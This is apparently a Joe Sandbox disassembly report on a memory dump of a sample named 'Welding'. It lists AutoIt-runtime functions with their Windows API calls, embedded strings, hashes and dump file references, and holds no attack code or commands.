Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 8f73bcc7d3df32a7de61d5ee00a70fbb7597e452b341f61f407d7f786705485f
Instruction ID: 7c0c834e24880fca3a31c498df34e70bc09ab938c01be9e338db4e0f231b65a3
Opcode Fuzzy Hash: 8f73bcc7d3df32a7de61d5ee00a70fbb7597e452b341f61f407d7f786705485f
Instruction Fuzzy Hash: 6DF06D36240158BBE3225B939C0DEEF7E3CEBCBB21F000159FA0591460E7B01A9186B5

Function 001177EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 001177FE
EnterCriticalSection.KERNEL32(?,?,000BC2B6,?,?), ref: 0011780F
TerminateThread.KERNEL32(00000000,000001F6,?,000BC2B6,?,?), ref: 0011781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,000BC2B6,?,?), ref: 00117829

Part of subcall function 001171F0: CloseHandle.KERNEL32(00000000,?,00117836,?,000BC2B6,?,?), ref: 001171FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 0011783C
LeaveCriticalSection.KERNEL32(?,?,000BC2B6,?,?), ref: 00117843

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 03c2dc253291e446b3b6586c22516aedaf0dbe69d03b5905aeb8610678f765b7
Instruction ID: c84755ea41505b7cb8554449d2cab382873f615635ebe2038c4368a698a0df54
Opcode Fuzzy Hash: 03c2dc253291e446b3b6586c22516aedaf0dbe69d03b5905aeb8610678f765b7
Instruction Fuzzy Hash: 89F0583A155212ABD7162B65EC8CEEB7B79FF4A702B140825F203A59F0CBB55881CB60

Function 0010954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00109555
UnloadUserProfile.USERENV(?,?), ref: 00109561
CloseHandle.KERNEL32(?), ref: 0010956A
CloseHandle.KERNEL32(?), ref: 00109572
GetProcessHeap.KERNEL32(00000000,?), ref: 0010957B
HeapFree.KERNEL32(00000000), ref: 00109582

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 0607d96759530bea3262d400c132741cefa4ca730696323c6f2a66772244d45c
Instruction ID: cf8978f7c66ca52cc4508e1004bfe5585bc608d300326b0ccbd271877bdb39cd
Opcode Fuzzy Hash: 0607d96759530bea3262d400c132741cefa4ca730696323c6f2a66772244d45c
Instruction Fuzzy Hash: 38E0E53A004141BFDB021FE2EC0C95ABF39FF4EB22B104620F71581870CB32A4A0DB50

Function 000BE3C6 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 000C1680: _memmove.LIBCMT ref: 000C16DB

VirtualFree.KERNEL32 ref: 000BE504
__swprintf.LIBCMT ref: 000BE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000BE431

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memmove$Exception@8FreeThrowVirtual__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1820510034-557222456
Opcode ID: 167f5b0562f39e246f25e654655e7c98a435ef541b1051d971ec0bee5995b2d2
Instruction ID: e5da1d3fe6295c2104b5e24358a27880941bedcadd37e391779c76a927e5bb39
Opcode Fuzzy Hash: 167f5b0562f39e246f25e654655e7c98a435ef541b1051d971ec0bee5995b2d2
Instruction Fuzzy Hash: 56917B715087419FC724EF24D895DFEB7E8AF96300F40091DF596972A3EA20EE44CBA2

Function 00128CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

#8.OLEAUT32(?,00140980), ref: 00128CFD
CharUpperBuffW.USER32(?,?), ref: 00128E0C
#9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00128F84

Part of subcall function 00117B1D: #8.OLEAUT32(00000000,?,?,?,?,?,00129DBE,?,?), ref: 00117B5D
Part of subcall function 00117B1D: #10.WSOCK32(00000000,?,?,00129DBE,?,?), ref: 00117B66
Part of subcall function 00117B1D: #9.WSOCK32(00000000,?,00129DBE,?,?), ref: 00117B72

Strings

Incorrect Parameter format, xrefs: 00128D35, 00128EF7
AUTOIT.ERROR, xrefs: 00128E12

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 3964851224-1221869570
Opcode ID: 32ee6952dcb08f9878f1030125700e3a15adae4d38ec979bd7c2f0ba6a6d66bf
Instruction ID: 87e9108ad0eec4640e449719f61b27cfc4af31ecdf551318032df13ab991439b
Opcode Fuzzy Hash: 32ee6952dcb08f9878f1030125700e3a15adae4d38ec979bd7c2f0ba6a6d66bf
Instruction Fuzzy Hash: A5919D756083019FC704DF24D481D9ABBF5EF99314F14896EF88A8B3A2DB30E945CB52

Function 0011323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D

_memset.LIBCMT ref: 0011332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0011335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00113410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0011343E

Strings

0, xrefs: 0011331A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: ba1bd5b2c34c871041e749cc18c9c6931710d9b0c3f5f3883d68e950f52efc9f
Instruction ID: fd9034d8923d7b54e8df3843d399d17f60e7b1e3dc3f8388d8fe8e1ad9e02b1b
Opcode Fuzzy Hash: ba1bd5b2c34c871041e749cc18c9c6931710d9b0c3f5f3883d68e950f52efc9f
Instruction Fuzzy Hash: CA51C4316083019BD71AAF28D8456EBBBE8AF45320F04453DF8A5D35E5DB70CE84CB56

Function 00119B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 000C4A8C: _fseek.LIBCMT ref: 000C4AA4

Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DE1
Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DF4

_free.LIBCMT ref: 00119C5F
_free.LIBCMT ref: 00119C66
_free.LIBCMT ref: 00119CD1

Part of subcall function 000D2F85: HeapFree.KERNEL32(00000000,00000000,?,000D9C54,00000000,000D8D5D,000D59C3), ref: 000D2F99
Part of subcall function 000D2F85: GetLastError.KERNEL32(00000000,?,000D9C54,00000000,000D8D5D,000D59C3), ref: 000D2FAB

_free.LIBCMT ref: 00119CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00119B8F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 14ba5c91a06815c757011cb1177d92be4ad81d0a52a9e04d1e7f33c649f9314a
Instruction ID: ed48b4ae93c48ed083d7e7d1ff91be4e03b36444a068a8801cec0ed34b9fe3ad
Opcode Fuzzy Hash: 14ba5c91a06815c757011cb1177d92be4ad81d0a52a9e04d1e7f33c649f9314a
Instruction Fuzzy Hash: BA512CB1904219ABDF289F64DC51BDEBBB9FF48304F0004AEB659A3341DB715A808F59

Function 00112EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00112F67
GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 00112F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00112FC9
DeleteMenu.USER32(?,?,00000000,?,00000000,00000000,00177890,?), ref: 00113012

Strings

0, xrefs: 00112F5C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 9730f9ea9da15c2a5377e910d3e17c267c3e9d94e747f4f954ec72343328be7f
Instruction ID: c29765c3161a21795aa18a5a45e15c19e5d75e95622aeb7a152e74d90437c21f
Opcode Fuzzy Hash: 9730f9ea9da15c2a5377e910d3e17c267c3e9d94e747f4f954ec72343328be7f
Instruction Fuzzy Hash: A341D5312083419FD728DF24C884F9ABBE4EF89310F104A2EF565972D1D770EA85CB62

Function 0012DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0012DEAE

Part of subcall function 000C1462: _memmove.LIBCMT ref: 000C14B0

Strings

stdcall, xrefs: 0012DF30
winapi, xrefs: 0012DF1F
cdecl, xrefs: 0012DF05
none, xrefs: 0012DF89

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 984461df234951f7183606d36023b282df733f714c1ef00a72a8c0899133b4d7
Instruction ID: 593394bd0c121f8e5d1e0c08036b7cbf2aa17d720404941fa62cbbb3e79d6ff6
Opcode Fuzzy Hash: 984461df234951f7183606d36023b282df733f714c1ef00a72a8c0899133b4d7
Instruction Fuzzy Hash: 4A319471900225AFCF10EF54ED41AEEB3B5FF15314B10862AF866A76D2DB31A916CB90

Function 00109A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00109ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00109ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00109B0F

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

Strings

ComboBox, xrefs: 00109A56
ListBox, xrefs: 00109A8B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 7f6206bbc9d00c2b9d4685fc567b2b289d5f68a1b3990c1a2d1b4a3de2e37869
Instruction ID: ff327714efe8c1019da8efe3aae17dcbaf9b1d17daa3e66bc51c4b654a4e835b
Opcode Fuzzy Hash: 7f6206bbc9d00c2b9d4685fc567b2b289d5f68a1b3990c1a2d1b4a3de2e37869
Instruction Fuzzy Hash: A0213772A01104BFDB14EBA0DC96DFFBB78DF46360F108119F8A5A72E3DB74490A8620

Function 00121EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00121F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00121F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00121F6E
InternetCloseHandle.WININET(00000000), ref: 00121FB5

Part of subcall function 00122B4F: GetLastError.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B64
Part of subcall function 00122B4F: SetEvent.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B79

Strings

, xrefs: 00121F5F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 1a24cae1eceade96f49dee707b1ad910ac3212bf0aa25303eee93a60680b2418
Instruction ID: d6072a9617778efb912e9870bb41eba5098f47e549f7cb2a93ccba0ec1bee25c
Opcode Fuzzy Hash: 1a24cae1eceade96f49dee707b1ad910ac3212bf0aa25303eee93a60680b2418
Instruction Fuzzy Hash: 592101B6604218BFEB12DF20ED85EBF77ADEB59744F10011AF94592200EB349D289BB1

Function 00136A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00136A86
LoadLibraryW.KERNEL32(?), ref: 00136A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00136AA2
DestroyWindow.USER32(?), ref: 00136AAA

Strings

SysAnimate32, xrefs: 00136A61

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 8c96171963d7e206fa4e7546b08ee11ab748589b10c1b29a1d5852a0785fe14a
Instruction ID: 6b6db943ae70602dcdff4c117dbd0947de20184cdc3cd346894db5526302d4ba
Opcode Fuzzy Hash: 8c96171963d7e206fa4e7546b08ee11ab748589b10c1b29a1d5852a0785fe14a
Instruction Fuzzy Hash: EE216D75204205BFEF118F64DC81EBB77ADEB59364F10CA19FA51A31A0D371DC9197A0

Function 00117357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00117377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001173AA
GetStdHandle.KERNEL32(0000000C), ref: 001173BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001173F6

Strings

nul, xrefs: 001173F1

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: ac98b08d03eefa1b36b87cc5b4b4d092508ecc55d66560da80efb964f142ca33
Instruction ID: 92168df63e193c47f9d77170723df3b082697ce37c244c43096dcb517766580e
Opcode Fuzzy Hash: ac98b08d03eefa1b36b87cc5b4b4d092508ecc55d66560da80efb964f142ca33
Instruction Fuzzy Hash: B4217C74508206ABDB288F69DC45ADA7BB4BF55720F204A29FDA1D73E0D7B09890DB60

Function 00117425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00117444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00117476
GetStdHandle.KERNEL32(000000F6), ref: 00117487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001174C1

Strings

nul, xrefs: 001174BC

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f3422e42a2992df62468ecf61771c69237f056196e502c87b8116b923dc1ad6f
Instruction ID: 36e9ff73c373221a563073076822f090c5f3999886394b90e617951243dcc8cb
Opcode Fuzzy Hash: f3422e42a2992df62468ecf61771c69237f056196e502c87b8116b923dc1ad6f
Instruction Fuzzy Hash: 4721B0356082069BDB289F699C44EDA7BB8AF55730F200A29F9A1D77D0DB7098D1CB50

Function 0011B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0011B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0011B2EB
__swprintf.LIBCMT ref: 0011B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00140980), ref: 0011B342

Strings

%lu, xrefs: 0011B2FE

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 744a2f821f608e437d12002b7667200f53b380a873f5a3ea4a198b3dc70946a3
Instruction ID: bef30466f2436fbafbaaa6ad8f94e7a21ec17c742bb241880c81a19e04d8401e
Opcode Fuzzy Hash: 744a2f821f608e437d12002b7667200f53b380a873f5a3ea4a198b3dc70946a3
Instruction Fuzzy Hash: A5213335A00209AFCB10DFA5CC85EEEB7B8EF89714B104069F905E7392DB71EA55CB61

Function 0010AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

Part of subcall function 0010AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0010AA6F
Part of subcall function 0010AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0010AA82
Part of subcall function 0010AA52: GetCurrentThreadId.KERNEL32 ref: 0010AA89
Part of subcall function 0010AA52: AttachThreadInput.USER32(00000000), ref: 0010AA90

GetFocus.USER32 ref: 0010AC2A

Part of subcall function 0010AA9B: GetParent.USER32(?), ref: 0010AAA9

GetClassNameW.USER32(?,?,00000100), ref: 0010AC73
EnumChildWindows.USER32(?,0010ACEB), ref: 0010AC9B
__swprintf.LIBCMT ref: 0010ACB5

Strings

%s%d, xrefs: 0010ACAF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
